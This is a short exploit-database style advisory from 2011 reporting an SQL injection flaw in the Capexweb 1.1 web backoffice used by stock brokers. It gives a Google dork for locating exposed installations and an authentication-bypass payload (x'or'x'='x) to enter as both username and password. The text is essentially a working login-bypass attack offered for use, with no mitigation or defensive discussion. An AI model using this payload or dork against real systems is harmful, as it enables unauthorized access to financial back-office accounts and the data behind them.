Capexweb version 1.1 suffers from a remote SQL injection vulnerability.
8800800f1e324a91954a28b54c1e1dd8d533e9207582667cb7762ecff080f92b
# Exploit Title: Capexweb Sql Vulnerable
# Date: 15 Dec 2011
# Author: D1rt3 Dud3
# Google Dork: inurl:capexweb
# Gr33ts: Th3 RDX
# Version: 1.1
# Description: Capexweb is Web based Backoffice client used by leading Stock Exchanges like Berkeley Gains, angle broking house etc.
http://localhost:8080/capexweb/capexweb/
Log in details:
Username: x'or'x'='x
Password: x'or'x'='x
-------------------------------------------------------------------------------"Indian"